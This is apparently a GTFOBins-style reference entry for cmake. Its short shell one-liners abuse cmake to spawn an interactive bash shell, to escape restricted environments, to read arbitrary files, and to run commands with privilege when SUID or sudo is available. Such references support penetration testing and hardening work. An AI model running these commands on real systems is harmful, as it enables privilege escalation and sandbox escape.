| description |
code |
| It can be used to break out from a restricted environment by spawning an interactive system shell. |
echo "execute_process(COMMAND bash -i)" > CMakeLists.txt
cmake .
|
|
|
| description |
code |
| It can read files, and may be used to perform privileged reads or discloe files outside a restrited file system |
LFILE=file_to_read
cmake -E cat $LFILE
|
|
|
| description |
code |
| It can perform execution in a privileged context, given the SUID bit is set |
echo "execute_process(COMMAND whoami)" > CMakeLists.txt
cmake .
|
|
|
| description |
code |
| It can perform execution in a privileged context, given the user can run the binary with sudo |
echo "execute_process(COMMAND bash -i)" > CMakeLists.txt
sudo cmake .
|
|
|
